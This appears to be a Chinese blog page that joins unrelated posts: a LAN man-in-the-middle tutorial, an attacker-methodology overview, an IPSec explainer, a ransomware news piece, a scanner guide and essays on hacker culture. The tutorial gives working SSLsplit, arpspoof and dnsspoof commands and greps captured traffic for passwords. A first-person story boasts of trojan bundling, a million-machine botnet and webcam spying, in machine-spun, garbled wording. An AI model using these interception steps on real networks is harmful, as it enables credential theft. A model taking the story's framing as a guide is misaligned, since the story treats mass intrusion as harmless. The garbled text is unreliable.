-l connect.log -j ./sslsplit -S /logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080```此命令在调试模式下启动SSLsplit (-D,在前台运行,后台没有,详细输出),输出城市连接在日志文件”connections.log”(-l)。真正的连接内容被写在./sslsplit/logdir/(-j和-S)每个单独文件中的每个连接的传入/传出TCP流。![](http://img.blog.csdn.net/37918)![](http://img.blog.csdn.net/00171)继续浏览就好。### 查找密码```find "*.log" | xargs grep "password" ```> 说明:伪造证书成功的关键:需要一个可信任的证书。# 利用DNS欺骗来攻击## 原理dnsspoof启用DNS欺骗,如果dnsspoof嗅探到局域网内有DNS请求数据包,它会分析其内容,并用伪造的DNS响应包来回复请求者。如果是请求解析某个域名,dnsspoof会让该域名重新指向另一个IP地址(黑客所控制的主机),如果是反向IP指针解析,dnsspoof也会返回一个伪造的域名。这里本地主机会抢先代替DNS服务器来相应查询,前提是本地主机先回答DNS查询,如果因为网络问题,DNS服务器先发送了应答,DNS欺骗就不能生效了。## 攻击### arpspoof数据转发通过arpspoof将目标主机发往网关192.168.1.1的数据都发送到kali所在主机地址192.168.1.152。```arpspoof -i eth0 -t 192.168.1.169 192.168.1.1```![](http://img.blog.csdn.net/26141)### 运行dnsspoof```dnsspoof```![](http://img.blog.csdn.net/46954)> 说明:如果在dnsspoof后加上参数-f 指定网址范围,则dnsspoof会针对此网址的请求进行欺骗,本实例中未指定网址,则返回本地的IP给dns解析请求者。
扫一扫分享到微信
,互联网创业公司合伙人,密码学爱好者,历史...
攻击者在一次攻击过程中通常采用如图![](http://g.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=baeb938eca903/21af3d7ca7acbd5cd.jpg)下面我们对攻击者的攻击过程中的各个步骤做一详细的介绍。###隐...
攻击者在一次攻击过程中通常采用如图![](http://g.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=baeb938eca903/21af3d7ca7acbd5cd.jpg)下面我们对攻击者的攻击过程中的各个步骤做一详细的介绍。###隐 藏位置隐藏位置就是有效地保护自己,在因特网上的网络主机均有自己的网络地址,根据TCP/IP协议的规定,若没有采取保护措施,很容易反查到某台网络主机的位置,如IP地址和域名。因此,有经验的 黑 客 在实施攻击活动时的首要步骤是设法隐藏自己所在的网络位置,包括自己的网络域及IP地址,这样使调查者难以发现真正的攻击者来源。攻击者经常使用如 下 技 术 隐 藏 他 们 真实 的IP 地 址或者域名:1. 利用被侵入的主机作为跳板, 如在安装Windows 的计算机内利用Wingate软件作为跳板,利用配置不当的Proxy作为跳板;2. 使用电话转接技术隐蔽自己,如利用电话的转接服务联接ISP;3. 盗用他人的账号上网,通过电话联接一台主机,再经由主机进入Internet;4. 免 费 代 理 网关 ;5. 伪 造IP地址 ;6. 假 冒用户帐号 。
###网络探测和收集资料在发动一场攻击之前,攻击者一般要先确定攻击目标并收集目标系统的相关信息。他可能在一开始就确定了攻击目标,然后专门收集该目标的信息;也可能先大量地收集网上主机的信息,然后根据各系统的安全性强弱来确定最后的目标。对于攻击者来说,信息是最好的工具。它可能就是攻击者发动攻击的最终目的(如绝密文件、经济情报);也可能是攻击者获得系统访问权的通行证,如用户口令、认证票据(ticket);也可能是攻击者获取系统访问权的前奏,如目标系统的软硬件平台类型、提供的服务与应用及其安全性的强弱等。攻击者感兴趣的信息主要包括:1. 操作系统信息;2. 开放的服务端口号;3. 系统默认帐号和口令;4. 邮件帐号;5. IP地址分配情况;6. 域名信息;7. 网络设备类型;8. 网络通信协议;9. 应用服务器软件类型。攻击者为了全面地掌握使目标系统的信息,常常借助软件工具,例如nmap、NESSUS、SATAN等。另外,攻击者进行搜集目标信息时,还要注意隐藏自己,以免引起目标系统管理员的注意。###弱点挖掘系统中脆弱性的存在是系统受到各种安全威胁的根源。外部攻击者的攻击主要利用了系统提供的网络服务中的脆弱性;内部人员作案则利用了系统内部服务及其配置上的脆弱性;而拒绝服务攻击主要是利用资源分配上的脆弱性,长期占用有限资源不释放,使其他用户得不到应得的服务,或者是利用服务处理中的弱点,使该服务崩溃。攻击者攻击的重要步骤就是尽量挖掘出系统的弱点,并针对具体的脆弱性研究相应的攻击方法。常用到的弱点挖掘技术方法有:- 系统或应用服务软件漏洞。攻击者还可以根据系统提供的不同的服务来使用不同的方法以获取系统的访问权限。如果攻击者发现系统提供了UUCP服务,攻击者可以利用UUCP的安全漏洞来获取系统的访问权;如果系统还提供其他的一些远程网络服务,如邮件服务、WWW服务、匿名FTP服务、TFTP服务,攻击者可以利用这些远程服务中的弱点获取系统的访问权。- 机信任关系漏洞。攻击者寻找那些被信任的主机。这些主机可能是管理员使用的机器,或是一台被认为是很安全的服务器。比如,他可以利CGI 的漏洞,读取/etc/hosts.allow文件等。通过这个文件,就可以大致了解主机间的信任关系。接下一步,就是探测这些被信任的主机哪些存在漏洞。- 寻找有 漏 洞 的 网 络 成 员 。尽量去发现有漏洞的网络成员对攻击者往往起到事倍功半效果,堡垒最容易从内部攻破就是这个缘故。用户网络安全防范意识弱,选取弱口令,使得从远程直接控制主机。- 安全策略配置漏洞。主机的网络服务配置不当,开放有漏洞的网络服务。- 通信协议漏洞。通过分析目标网络所采用的协议信息,寻找漏洞,如TCP/IP协议就存在漏洞。- 网络业务系统漏洞通过掌握目标网络的业务流程信息,然后发现漏洞,例如,在WWW服务中,允许普通用户远程上载的文件执行。###掌握控制权一般帐户对目标系统只有有限的访问权限,要达到某些目的,攻击者必须有更多的权限。因此在获得一般帐户之后,攻击者经常会试图去获得更高的权限,如系统管理帐户的权限。获取系统管理权限通常有以下途径:1. 获得系统管理员的口令,如专门针对root用户的口令攻击;2. 利用系统管理上的漏洞:如错误的文件许可权,错误的系统配置,某些SUID程序中存在的缓冲区溢出问题等;3. 让系统管理员运行一些特洛伊木马,如经篡改之后的LOGIN程序等。###隐藏行踪做为一个入侵者,攻击者总是惟恐自己的行踪被发现,所以在进入系统之后,聪明的攻击者要做的第一件事就是隐藏自己的行踪,攻击者隐藏自己的行踪通常要用到如下技术:1. 连接隐藏,如冒充其他用户、修改LOGNAME环境变量、修改utmp日志文件、使用IP SPOOF技术等;2. 进程隐藏,如使用重定向技术减少ps给出的信息量、用特洛伊木马代替ps程序等;3. 篡改日志文件中的审计信息;4. 改变系统时间造成日志文件数据紊乱以迷惑系统管理员。###实施攻击不同的攻击者有不同的攻击目的,可能是为了获得机密文件的访问权,也可能是破坏系统数据的完整性,也可能是整个系统的控制权:系统管理权限,以及其他目的等。一般说来,可归结为以下几种方式:1. 下载敏感信息;2. 攻 击 其 他 被 信 任 的 主 机 和 网 络;3. 瘫 痪 网 络;4. 修改或删除重要数据。###开辟后门一次成功的入侵通常要耗费攻击者的大量时间与精力,所以精于算计的攻击者在退出系统之前会在系统中制造一些后门,以方便自己的下次入侵,攻击者设计后门时通常会考虑以下方法:1. 放宽文件许可权;2. 重新开放不安全的服务,如REXD、TFTP等;3. 修改系统的配置,如系统启动文件、网络服务配置文件等;4. 替换系统本身的共享库文件;5. 安装各种特洛伊木马,修改系统的源代码;6. 安装sniffers。
扫一扫分享到微信
,互联网创业公司合伙人,密码学爱好者,历史...
当通信双方建立了一个SA后,它们就有了所有用来计算它们交换的数据报的ICV值的参数。ICV的计算涉及到整个IP头,然而有些域在从源到目的的传输过程中可能会改变,所以在计算ICV时将这些域设为0。**首先需要了解IPv4和IPv6数据包头的可变域和不变域。...
当通信双方建立了一个SA后,它们就有了所有用来计算它们交换的数据报的ICV值的参数。ICV的计算涉及到整个IP头,然而有些域在从源到目的的传输过程中可能会改变,所以在计算ICV时将这些域设为0。**首先需要了解IPv4和IPv6数据包头的可变域和不变域。**哪些被计算进去了,而哪些被设置为0.###IPv4头的可变域![](http://f.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=c4b6d07dcf5cc6ecc95f7fa.jpg)(图片来源于搜索)**服务类型(Type of service)**:8比特的服务类型(TOS)域表明了数据报所属数据流的需求,这个需求是针对延迟、吞吐量和可靠性的组合而言的。IP协议并不认为这个域是可变的,但IPSec将它作为可变域对待,因为现有的一些路由器会改变这些域。**标志(FLAGS)**:IP头中有三个标志位。第一个是DF(不可分段)位,当这个位被设置的时候表明不允许对数据报分段。第二个是MF(更多分段)位,当这个位为0的时候表明数据包的最后一个数据分段到达。第三个被保留做将来使用。ICV的计算不包括这个域,因为即使数据源没有设置这个位,中间的路由器也可能设置DF位。**分段偏移量(Fragment offset)**:这个13比特的域表明一个分段在它所属的数据报中的位置。AH仅应用于非分段的IP包;所以在计算ICV之前,必须将这个域设为0。**TTL:**这8比特的域被用来限制一个数据报的生命期,**因此可以防止数据报在一个网段中无限循环**。数据报在经过每个路由器时,它的TTL值都被路由器减小。目的主机无法预计TTL值,所以这个域被排除在ICV的计算之外。**头校验值(Header checksum)**:这个16比特域保存IP头的校验和。如果IP头的任一个域发生了变化,校验和的值也会变化,所以在计算ICV之前,必须将这个域设为0。**可选项(Options):**这个变长域存放数据包的可选信息,比如安全性和处理限制。这个域很少被使用,并且被大多数的路由器忽略。所以大部分的IPSec实现在计算ICV时都不包含可选项。###IPv4头的不变域- 版本(Version)。- 头长度(IHL)。- 总长度(Total length)。- 标识(Identification)。- 协议(Protocol)。- 源地址(Source address)。- 目的地址(Destination address)。- 数据(Data)(被封装的传输协议头和数据)。###IPv6头的可变域- 优先级(Priority):这个4比特的域表明一个数据包要求的服务质量。这个域可能会被中间的路由器改变,所以它没有被包含在ICV的计算中。- 流标签(Flow label):这个24比特的域是一个实验性的域。大多数应用忽略它,最终IPSec强制在计算ICV值之前将其设为0。- 跳数限制(Hop limit):这个跳数限制域和IPv4的TTL域相同。它在经过每个路由器时都被减小1。逐跳和目的选项扩展头中包含一个比特,用来表明这个选项在传输过程中是否可能发生变化。可以通过设置和取消这些比特来指定这些扩展头可变还是不可变。逐跳扩展头被用来携带可选的路由信息,数据报从源到目的沿途的每个节点都必须检查这些信息。目的选项扩展头携带仅需由目的节###IPv6头的不变域- 版本(Version)。- 载荷长度(Payload length)。- 下一个头(Next header)。- 源地址(Source address)。- 目的地址(Destination address)。###可变但可预测路由扩展头有可变但可预测的特性。IPv6数据源用这个扩展头列出数据包从源到目的途径中的一个或多个网关。路由扩展头中的地址域可能在传输中被重排;然而数据包在目的主机时的内容的形式对发送者和中间节点而言却是已知的。所以,可以由发送者排列地址域使其和发送到目的地时相同。因此是在计算ICV时包含了这个扩展头。如果有分段扩展头的话,它对IPSec而言是不可见的,因为它在外出的IPSec处理后才出现;而重组工作在进入IPSec处理之前进行。所以,在计算ICV时这个扩展头不予考虑。##重头戏:完整性校验值(ICV)把IP的可变域和IPv6可变扩展头设为0后,**整个IP数据报以一个比特串的形式作为MAC的输入**。MAC采用指定的密钥生成ICV。值得注意的是,在隧道模式中,内部IP头的可变域未被设为0,因为只有外部IP头的可变域才可能在传输过程中被修改。ICV的长度依赖于使用的MAC算法。例如,对于HMAC-MD5,ICV是128比特;而对于HMAC-SHA1,ICV是160比特。如果一个MAC算法生成的IPv4数据报的ICV长度不是32的整数倍,或生成的IPv6数据报的ICV长度不是64的整数倍,则需要增加填充比特使ICV达到32(IPv4)或64(IPv6)的整数倍。计算出ICV(有必要的话还得对它进行填充)之后,把它放在认证数据域中,然后数据报将被发送到目的地址。
扫一扫分享到微信
  对于一个没节操的黑客来说,他关心的唯一指标就是:投入精力和回报金钱的比值。在现在网络安全漏洞百出,追查手段捉襟见肘的情况下,敲诈成为了非常合算的生意。虽然我们不愿承认,但对于敲诈者来说,现在算是一个“风口”。
  以网络为首的...
  对于一个没节操的黑客来说,他关心的唯一指标就是:投入精力和回报金钱的比值。在现在网络安全漏洞百出,追查手段捉襟见肘的情况下,敲诈成为了非常合算的生意。虽然我们不愿承认,但对于敲诈者来说,现在算是一个“风口”。
  以网络为首的互联网日益发达,让黑客的访问请求可以在不同的服务器间跳转,行踪难以被追查。这使得他们在网上几乎不会留下任何犯罪的“指纹”。
  比特币这种虚拟货币盘踞在全球金融系统之外。比特币的构建形式决定了每一笔交易都无法被追查。相比传统的敲诈,还要找一个垃圾桶把现金放进去,比特币简直就是敲诈这的天堂。
  由于敲诈木马的产业链已经在黑市中构建起来,所以普通的黑客也可以轻易花很低的价格买到这些木马的原型,再根据自己的需要进行改造。这样的时间和经济成本都非常低。
  所以,黑客们可以非常容易地向全世界发出数以百万计的木马邮件,而这些目标中,只要有一部分中招,他们中间哪怕只有几个人选择支付赎金,对于黑客来说就可以获得不菲的收益。“付费率”并不是他们追求的目标。
  在这种思想的指导下,黑帽黑客们会选择谁作为敲诈对象呢?
  在大千世界里,个体永远是最薄弱的一环。他们安全只是有限,当然也不会购买大量的安全服务来武装自己。关键的问题在于,现在我们每个人的工作文档、个人照片、小电影或者音乐都会存在个人设备中。而这些设备一旦联网,就有可能被黑客植入木马,进而锁定。
  如果遇到玻璃心的用户,很可能在黑客要把自己羞羞的照片公布于众的威胁下崩溃掏钱;
  而对于理性的个人,如果被锁定的文件真的有很大的价值,而恰好没有来得及备份,他也会选择付费解锁。
  商业公司
  所有的公司都或多或少都需要电脑系统来处理日常的事务,而公司往往比个人有钱。黑客选择勒索公司,大概有三个原因:
  对于大公司而言,例如连锁餐饮企业,每天的财物数据都会通过内部网络汇总,一旦系统被黑客锁定,将会造成极大的损失。另外,企业电脑上存储的资料往往非常有价值,并且有可能涉及商业机密。
  对于某些公司来说,系统瘫痪每多一秒,就会多一份可以计算出来的经济损失。坐在办公室里的老板眼看自己公司成熟真金白银的损失,还是很触目惊心的。
  对于很多企业来说,系统瘫痪会对企业声誉造成巨大的损失,从而失去客户的信任。这些无法衡量的损失,比起可以计量的赎金来说,更加可怕。
  这也不难解释为什么很多企业面对赤裸裸的敲诈,最终都会选择低调地给钱了事了。
  政府机关
  向政府机关要钱,是一种刀头舔血的生意。敢于敲诈政府的黑客,走的大概就是索马里海盗的套路。
  然而,这种事情在现实世界真实地发生了,而且不止一次。
  2016年2月,美国城市达勒姆的警察局电脑系统竟然被黑客的敲诈木马锁定,然而,警察叔叔们决定誓死不从。他们经过艰苦的自力更生,彪悍地恢复了系统,让黑客扑了个空。然而,作为警察,他们最终也没有办法定位黑客的具体位置。这件事情只能不了了之。
  同样是在2016年2月,美国城市梅尔罗斯的警察局也被木马感染,勒索木马把一个用来派遣警员和安排巡逻的系统“TriTech”锁死。然而,这群警察叔叔中间没有像达勒姆警局那样的技术宅,最终,大叔们选择给黑客1比特币,买回了解锁密码。
  敲诈警察,而且还能成功,这大概能入选敲诈界的杰出人物了。
  消防局
  既然连警察局都敢敲诈,搞一下消防局也合情合理吧。对于消防局或者其他紧急事态处置机构的敲诈最近愈演愈烈。原因很简单,因为消防局的系统是经不起罢工的。
  每耽误一秒钟,都有可能有人付出生命的代价。
  然而,冷血的罪犯才不会考虑这些,他们眼里,只有赎金这块肥肉。
  医疗机构
  同样,和人命息息相关的还有医院。
  2016年2月,好莱坞一家医疗中心被黑客锁定。数万名患者的病例全部被锁定,而由于害怕感染扩大,院方下令医院的所有人都不准打开电脑。这就造成了数百万美元的医疗器械全部成为冰冷的废铁。
  在被锁定的时间内,医院的所有办公全部“回到解放前”,医生用手为病人写处方,恨不能亲自为病人画X光片。
  但是,黑客不管这些,狮子大开口向医院索要9000比特币,这个金额相当于360万美元。最终,医院在和黑客对峙了十天之后,终于扛不住了,经过谈判支付给敲诈者40比特币。
  【被黑客攻击的医院:洛杉矶的好莱坞长老会医疗中心】
  而在今年4月,洛杉矶的卫生局也有五台电脑被感染。不过,显然这五台电脑上没有那么宝贵的资料,卫生局大手一挥,告诉黑客自己打死也不会付款。
  学生是祖国的花朵。为了花朵,人们总是愿意付点钱的。同样是在2016年2月,美国就有两所小学的电脑系统遭到了黑客木马锁定。
  其中一个名为霍利郡小学的校领导觉得黑客的行为简直是丧尽天良,愤而报告 FBI(美国联邦调查局)。FBI
经过缜密的调查研究,夜以继日地破解追寻,决定建议学校向黑客付钱。。。
  最终,学校决定在 FBI 的指导下,向黑客支付了8500美元的赎金。
扫一扫分享到微信
我不是黑客,只说说本身当年那些无知无畏的事吧...
2000年时我得到第一台电脑,恰好六年级,猖獗爱上了这个东西,利用统统机遇学习...
初中时开始玩盗号,当时用得比较好的是广外男生,广外女生,冰河之类的玩意,直接在家相近的网吧装上.当时...
我不是黑客,只说说本身当年那些无知无畏的事吧...
2000年时我得到第一台电脑,恰好六年级,猖獗爱上了这个东西,利用统统机遇学习...
初中时开始玩盗号,当时用得比较好的是广外男生,广外女生,冰河之类的玩意,直接在家相近的网吧装上.当时的网吧连万象美萍这些必备的办理体系也没有,固然也没有还原卡这类终极武器,于是理所固然的,每天都看着一个个新帐号发到本身的邮箱...时期盗下了无数QQ号,传奇,石器,古迹号.不过当时人傻啊,盗下的号送了些同砚,另有些低价转售,我本人也不玩游戏,当时还底子没意识到游戏帐号的高代价啊.
其后用着这些现成的盗号东西着实不爽,就开始本身写了,以后开始学习delphi.delphi真是好东西,新手入门快,老鸟也可深入,本身的盗号东西最大的长处是可以直接克制种种杀软,免得还要做免杀.那个年代的杀软,什么瑞星,KV,金山,如今想想真是够垃圾的,并且还每天要更新病毒库...
再其后忽然暴了个win2000输入法弊端,每天就开着扫描器,对着一个个网段扫描,然掉队办事器里瞎折腾,不过我从来不干删数据格盘等缺德事,当时不警惕还进了某个省的德律风运营体系,不过看着上面的数据还是不敢动手.
当时对黑客的东西敬拜至今,黑防,X档案,之类的书是每期必看的,学了很多多少东西,也练过了很多真机.如今想想,天生这个新年代的人也是挺遗撼的,那互联网初期的很多风趣的事变都不大概再重现喽...
背面玩腻了就老诚实着实家自学编程,啃了一本本书,时期啃了本JAVA从入门到夺目标书(本书是我当时敬拜的一名电脑能手保举的,我记得很明白,49.8人民币,当时天价的书啊),我反重复复翻读了几遍,其间做了不少记录,但最悲剧连根本运行环境都没搞定,刚强扔了,重新老诚实实用我的DELPHI.
再其后又到了高中,开始写共享软件(当时最崇拜的便是超等免子另有优化大家的作者,偶像啊),一个月就千把元,如今看来未几但是当时对我一个小屁孩来说,太不测了,要知道,我从小到大家里从不给零费钱,当时也没办什么银行卡,每月就到镇上的邮局去领钱,哈哈...然后把小时间很多物质上的心愿给餍足了,比如买个随身听,比如饱餐一餐麦当劳.至今我还非常吊唁那天下午的那个麦当劳套餐,它是我有生来以最过的最鲜味的...
当我还迷恋于写代码的成绩感时,插件的天下到临了,当时应该是04,05年吧...我本身写了木马,做了一个EXE捆绑器,直接捆绑到种种着名软件里,比如迅雷,QQ...汗...用户下载下来神不知鬼不觉就成了我的肉鸡...当时下载站连根本的考核都没有,随任意便就能提交.然后再不知不觉,我发明手头上控制的肉鸡高出百万台....吓去世鸟了...肉鸡是通过不绝读取假造主机上的txt文件来实行种种下令的,其间我也未能免俗,给肉鸡装了插件.控制的肉鸡我没想过要转卖,安置的插件也不停是正常的插件,并且每台电脑我根本上最多只装一到两个.唉,我忽然以为本身是那个浑浊期间一个心地非常善良的人了,别喷我.
按一个插件3分或4分算,着实也没赚多少啦,也就5,6万.当时家人知道我的收入是又惊又喜,固然我没报告他们我怎么赚的.再其后到了高二放学期,电脑被家里逼迫充公了,我也开始认认真真准备高考了,可怜我那些优质纯种未经好好开辟的马儿啊,就如许消散得不明不白了(这真要归功于360的崛起!).
高考一结束,我归去查了马儿的数量,只剩几万,不过也是玩腻了,垂垂不玩了.(话说长途控制肉鸡然后捉弄对方是一件非常风趣的事变,偶然开对方摄像头还看到很多不该看到的东西,我如今呆板绝不装摄像头...)
对玩黑垂垂失去兴趣了,搞入侵,破解,逆向,盗号终究不是我心田喜好的,以后我走上我的共享软件之路,征战外洋共享软件市场....再然后11年大学毕业,再到客岁开了一个小小的软件公司,开始了一个步伐员的空想之旅......
扫一扫分享到微信
,互联网创业公司合伙人,密码学爱好者,历史...
> 在Internet安全领域,扫描器是常用攻击工具之一。许多网络入侵是从扫描开始的。利用扫描器能够找出目标主机的各种安全漏洞,尽管其中的一些漏洞早已公布于众,但在许多系统中仍然存在,于是给了外部入侵以可乘之机。
![](http://c.hiphotos.baid...
> 在Internet安全领域,扫描器是常用攻击工具之一。许多网络入侵是从扫描开始的。利用扫描器能够找出目标主机的各种安全漏洞,尽管其中的一些漏洞早已公布于众,但在许多系统中仍然存在,于是给了外部入侵以可乘之机。
![](http://c.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=07eee609fadeb48ffb3ca9dac52f161f/0d338744ebf81a4cab1b90a1de2aa9.jpg)扫描器是一种自动检测远程或本地主机安全性弱点的程序,通过使用扫描器,我们可以自动发现系统的安全缺陷。不同的扫描器检查不同的安全漏洞,但一般来说归结为两种类型:- 主机系统扫描器;- 网络扫描器。**主机系统扫描器**用来扫描查找本地主机的安全漏洞,这些漏洞经常是错误的文件权限配置和默认帐号。主机系统扫描器的最常见工具是COPS(Computer
Password System) ,它是用来检查UNIX系统的常见安全配置问题和系统缺陷。网络扫描器是通过检查可用的端口号和服务,查找远程攻击者所能利用的安全缺陷。SATAN(System Administrator’s Tool for Analyzing Networks)是一个著名的网络扫描器,它可以用来发现以下方面的漏洞:1. 文件传输协议漏洞;2. 网络文件系统漏洞;3. 网络信息服务口令漏洞;4. 远程shell访问漏洞;5. Sendmail漏洞漏洞;6. 普通文件传输协议漏洞;7. X服务器安全和访问控制。另外,还有SAINT、ISS 、NESSUS、NMAP 等有名的网络扫描器。由于网络系统中有新的漏洞出现,所以扫描器要不断地更新的检查漏洞库或检查程序。![](http://b.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=c26f13edc0ea15ce41bbe80d/4bed2e738bd4b31cedff869.jpg)##工作原理尽管从技术的角度来看,主机系统扫描器和网络扫描器不尽同,但是它们具有共同的特征。其中,就是扫描器的检测机制。大多数扫描器按上图所示的工作流程工作。**以网络扫描器为例,**我们分析扫描器的工作原理。网络扫描器是通过连接远程TCP/IP不同的端口的服务,并记录目标给予的回答,就可以搜集到很多关于目标主机的各种有用的信息(如是否能用匿名登录访问FTP服务,是否有可写的FTP目录,是否能用Telnet,HTTPD是用Root还是普通用户在运行)。当目标主机运行的是Unix操作系统时,通常提供了较多的服务。可以对该主机的端口扫描一遍,检测它提供了哪些服务。例如,扫描主机192.168.0.68的10到100之间的端口,结果如下:$portscan
192.168.0.68
100192.168.0.68 21 accepted192.168.0.68 23 accepted192.168.0.68 25 accepted192.168.0.68 80 accepted可以看出,主机192.168.0.68在21、23、25和80这些端口都提供服务。对于1024以下的端口,端口号与服务的对应是固定的。例如:21对应的是FTP服务23对应的是telnet服务25对应的是mail服务80对应的是Web服务在Unix系统中,还有一些可以扫描某些特定服务的工具,用于观察某一特定服务进程是否正在远程主机上运行。例如,rusers和finger,这两个都是Unix命令。通过这两个命令,你能收集到目标计算机上的有关用户的消息。使用rusers命令,产生的结果如下示意:wh
yjb.dcs:ttyp1
Nov 13 15:42
7:30 (remote)root
yjb.dcs:ttyp2
Nov 13 14:57
7:21 (remote)显示了通过远程登录的用户名,还包括上次登录时间、使用的Shell类型等信息。使用finger可以产生类似下面的结果:user S00
PPP ppp-122-pm1.wiza
Thu Nov 14 21:29:30 - still logged inuser S15
PPP ppp-119-pm1.wiza
Thu Nov 14 22:16:35 - still logged inuser S04
PPP ppp-121-pm1.wiza
Fri Nov 15 00:03:22 - still logged inuser S03
PPP ppp-112-pm1.wiza
Thu Nov 14 22:20:23 - still logged in这个命令能显示用户的状态。该命令是建立在客户/服务模型之上的。用户通过客户端软件向服务器请求信息,然后解释这些信息,提供给用户。在服务器上需要运行fingerd程序,根据服务器的配置,能向客户提供某些信息。若考虑到保护这些个人信息,有可能许多服务器不提供这个服务,或者只提供一些无关的信息。对于一个功能较完备的扫描器,它能对操作系统与服务程序存在的各种系统漏洞和Bug进行检测。为了实现该项功能,需要检查各个系统配置文件,例如,/etc/passwd
口令文件/etc/hosts
主机列表文件/etc/networks
网络列表文件/etc/protocols
协议列表文件/etc/services
服务列表文件/etc/hosts.equiv 主机信任列表文件比较成熟的扫描器,如SATAN,Nessus,ISS等,都能对这些配置文件进行细致的检测,并给出完整的报告和建议。
扫一扫分享到微信
黑客( 大陆和香港:黑客;台湾:骇客,英文:Hacker),通常是指对计算机科学、编程和设计方面具高度理解的人。“黑客”也可以指:泛指擅长IT技术的人群、计算机科学家。Hacker们精通各种编程语言和各类操...
黑客( 大陆和香港:黑客;台湾:骇客,英文:Hacker),通常是指对计算机科学、编程和设计方面具高度理解的人。“黑客”也可以指:泛指擅长IT技术的人群、计算机科学家。Hacker们精通各种编程语言和各类操作系统,伴随着计算机和网络的发展而产生成长。“黑客”一词是由英语Hacker音译出来的,这个英文单词本身并没有明显的褒义或贬义,在英语应用中是要根据上下文场合判断的,其本意类似于汉语对话中常提到的捉刀者、枪手、能手之类词语。在信息安全里,“黑客”指研究智取计算机安全系统的人员。利用公共通讯网路,如互联网和电话系统,在未经许可的情况下,载入对方系统的被称为黑帽黑客(英文:black hat,另称cracker);调试和分析计算机安全系统的白帽黑客(英语:white hat)。“黑客”一词最早用来称呼研究盗用电话系统的人士。在业余计算机方面,“黑客”指研究修改计算机产品的业余爱好者。1970年代,很多的这些群落聚焦在硬件研究,年代,很多的群落聚焦在软件更改(如编写游戏模组、攻克软件版权限制)。“黑客”是“一种热衷于研究系统和计算机(特别是网络)内部运作的人”。黑客兵工厂所做的不是恶意破坏,他们是一群纵横于网络上的技术人员,热衷于科技探索、计算机科学研究。在黑客圈中,Hacker一词无疑是带有正面的意义,例如:system hacker熟悉操作的设计与维护;password hacker精于找出使用者的密码,若是computer hacker则是通晓计算机,进入他人计算机操作系统的高手。根据开放源代码的创始人“埃里克·S·雷蒙德”对此字的解释是:“黑客兵工厂Hacker”与“cracker”是分属两个不同世界的族群,基本差异在于,黑客是有建设性的,而骇客则专门搞破坏。黑客原意是指用斧头砍柴的工人,最早被引进计算机圈则可追溯自1960年代。加州大学伯克利分校计算机教授Brian Harvey在考证此字时曾写到,当时在麻省理工学院(MIT)中的学生通常分成两派,一是tool,意指乖乖牌学生,成绩都拿甲等;另一则是所谓的骇客,也就是常逃课,上课爱睡觉,但晚上却又精力充沛喜欢搞课外活动的学生。等级区分一开始并没有。不过当时黑客也区分等级,就如同tool用成绩比高下一样。真正一流黑客并非整天不学无术,而是会热衷追求某种特殊嗜好,比如研究电话、铁道(模型或者真的)、科幻小说,无线电,或者是计算机。也因此后来才有所谓的computer hacker出现,意指计算机高手。计算机黑客编程对一个黑客来说,学会编程是必须的,计算机可以说就是为了编程而设计的,运行程序是计算机的唯一功能。对了,数学也是不可少的,运行程序其实就是运算,离散数学、线性代数、微积分等!黑客一词在圈外或媒体上通常被定义为:专门入侵他人系统进行不法行为的计算机高手。不过这类人士在hacker眼中是属于层次较低的cracker(骇客)。如果黑客是炸弹制造专家,那么骇客就是恐怖分子。随着时代的发展,网络上出现了越来越多的骇客,他们只会入侵,使用扫描器到处乱扫,用IP炸弹炸人家,毫无目的地入侵,破坏着,他们并无益于电脑技术的发展,反而有害于网络的安全和造成网络瘫痪,给人们带来巨大的经济和精神损失。以下列举不同类型或等级的黑客:·黑客(术语),对技术研修深入的计算机安全专家。·黑客(计算机安全)或饼干,访问计算机系统安全系统失灵。·黑客(爱好者),以创新的定制或组合的零售电子和电脑设备。·黑客(程序员亚文化),一个反独裁的软件开发方法,伴随着自由软件运动。起源“黑客”一词是英文Hacker的音译。这个词早在莎士比亚时代就已存在了,但是人们第一次真正理解它时,却是在计算机问世之后。根据《牛津英语词典》解释,“hack”一词最早的意思是劈砍,而这个词意很容易使人联想到计算机遭到别人的非法入侵。因此《牛津英语词典》解释“Hacker”一词涉及到计算机的义项是:“利用自己在计算机方面的技术,设法在未经授权的情况下访问计算机文件或网络的人。”最早的计算机于1946年在宾夕法尼亚大学诞生,而最早的黑客出现于麻省理工学院。贝尔实验室也有。最初的黑客一般都是一些高级的技术人员,他们热衷于挑战、崇尚自由并主张信息的共享。1994年以来,因特网在中国乃至世界的迅猛发展,为人们提供了方便、自由和无限的财富。政治、军事、经济、科技、教育、文化等各个方面都越来越网络化,并且逐渐成为人们生活、娱乐的一部分。可以说,信息时代已经到来,信息已成为物质和能量以外维持人类社会的第三资源,它是未来生活中的重要介质。而随着计算机的普及和因特网技术的迅速发展,黑客也随之出现了。
扫一扫分享到微信
在我眼中有两种黑客,一种是真的黑客,他们身怀奇技,崇尚自由,博学多识,乐于分享。
他们每每善于coding,是如今的网络天下的创造者,网络的繁荣便是由于向其他人分享资源才创建的。
第一位的这个人私家你可以ignore,由于听说他很善...
在我眼中有两种黑客,一种是真的黑客,他们身怀奇技,崇尚自由,博学多识,乐于分享。
他们每每善于coding,是如今的网络天下的创造者,网络的繁荣便是由于向其他人分享资源才创建的。
第一位的这个人私家你可以ignore,由于听说他很善于包装本身,也比较狂一些,某先辈说,他成为天下头号黑客是由于其他人都很低调,这货倒因此为没人抢第一,那我就“抢地主”,成了“天下头号黑客”。
第二,第三未几讲,他们都是真正意义上的黑客。
中间的几个不熟,但是多数都可以从他们的经历上看得出,他们都是创造者。
嗯,听说乔布斯和盖茨也算是Hacker呢,媒体人总是种种帽子乱扣。
第八个是埃里克·雷蒙德,这人是当时黑客构造的棋手,开源活动便是这位提倡的。时至本日,试看另有多少所谓的“黑客”乐意拿出本身的源代码分享给大家?
第十个是罗伯特·莫里斯,雷同所谓“崖山之后无中国”,他制造了蠕虫病毒,并让媒体开始聚焦于这群,以后黑客一词开始变味,大家眼中的黑客险些成了这些粉碎者的代名词。
但是,清者自清,真正的黑客在IT行业内永久还是niubility的一群人
----------------------------------------------------------------------------------------------------------------------
接下来说的是媒体口中的“黑客”和某些人自称的“黑客”。
他们有着近乎癫狂的对款项的渴望,那谁,你为了着名,把名字留在人家站上,还放种种非主流的音乐,也好不到哪儿去
